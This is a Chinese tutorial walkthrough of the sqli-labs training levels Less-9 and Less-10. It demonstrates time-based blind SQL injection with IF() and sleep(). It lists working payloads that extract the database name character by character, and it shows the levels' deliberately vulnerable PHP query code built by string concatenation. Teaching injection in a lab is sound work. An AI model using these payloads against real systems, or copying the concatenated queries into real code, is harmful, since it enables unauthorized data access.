Less 9 和 Less 10 都是时间盲注,主要思想是利用 IF 语句,结合 sleep() 函数制造时间差来判断注入的正确性。
Less-9
GET-Blind-Time based-Single Quotes(基于时间的 GET 单引号盲注)
判断注入类型
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
?id=1
接下来注入个查不到的参数,网页还是返回 “You are in...”。
?id=9999
注入个单引号进行闭合,网页还是返回 “You are in...”。
?id=1'
以下 3 种注入仍然还是返回 “You are in...”,说明此时网页不会回显任何有价值的信息。
?id=1'--+
?id=1"
?id=1"--+
转换思路,MySql 的 sleep() 函数能够起到休眠的作用。为了方便调试这里使用 brup 的重发器,注入如下参数响应时间没有异常。
?id=1 and sleep(1)--+
注入如下参数响应时间明显增加,并且主观上也能感受到延迟。这是明显的基于 时间盲注 的字符型 Sql 注入漏洞,我们需要使用 sleep() 函数制造时间差进行注入。
?id=1' and sleep(1)--+
获取数据库信息
注入流程与 Less 5 类似,不过这里的判断标准不是会显的信息,而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或值结果来执行一组 SQL 语句,语法如下,当表达式 expr 为真时返回 value1 的值,否则返回 value2。
IF(expr, value1, value2)
此处因为无法回显任何东西,因此 ORDER BY 子句失效。我们使用 IF 语句结合 LENGTH() 函数对数据库名长度进行判断,如果猜测正确则令响应时间长一些。猜测数据库名长度小于 10 时响应时间超过,所以数据库名长度小于 10。
?id=1' AND IF(LENGTH(database())<10,sleep(1),1)--+
经过二分法测试,得出数据库长度为 8。
?id=1' AND IF(LENGTH(database())=8,sleep(1),1)--+
使用 left() 函数判断数据库名的第一位是否是字符 a,注入之后响应很快说明数据库名第一位不是 a。
?id=1' AND IF(LEFT((SELECT database()), 1)='a',sleep(1),1)--+
使用穷举法进行测试,得出数据库名的第一个字符为 “s”。
?id=1' AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+
接下来得出数据库名,再使用同样的方法继续爆破表名、字段名及其剩余信息。
?id=1' AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+
关卡 SQL 查询语句
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
Less-10
GET-Blind-Time based-double quotes(基于时间的双引号盲注)
判断注入类型
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
?id=1
以下 5 种注入都是还是返回 “You are in...”,说明此时网页不会回显任何有价值的信息。
?id=9999
?id=1'
?id=1'--+
?id=1"
?id=1"--+
为了方便调试这里使用 brup 的重发器,注入以下 2 种参数响应时间没有异常。
?id=1 and sleep(1)--+
?id=1' and sleep(1)--+
使用双引号闭合时,响应时间明显增加,并且主观上也能感受到延迟,这是基于 时间盲注 的字符型 Sql 注入漏洞。
?id=1" and sleep(1)--+
获取数据库信息
Less 10 和 Less 9 差不多,知识 Less 10使用双引号进行闭合。此处因为无法回显任何东西,因此 ORDER BY 子句失效。使用 IF 语句结合 LENGTH() 函数进行诸如,猜测数据库名长度小于 10 时响应时间超过 1 秒。
?id=1" AND IF(LENGTH(database())<10,sleep(1),1)--+
经过二分法测试,得出数据库长度为 8。
?id=1" AND IF(LENGTH(database())=8,sleep(1),1)--+
获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
?id=1" AND IF(ASCII(SUBSTR((SELECT database()),1,1))>109,sleep(1),1)--+
使用二分法进行测试,最后得出数据库名的第一个字符 ASCII 码值为 115。
?id=1" AND IF(ASCII(SUBSTR((SELECT database()),1,1))=115,sleep(1),1)--+
使用相同方法依次得出剩下的字符 ASCII 码值,连接在一起就是数据库名。
?id=1" AND IF(ASCII(SUBSTR((SELECT database()),2,1))=102,sleep(1),1)--+
关卡 SQL 查询语句
$id = '"'.$id.'"';
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}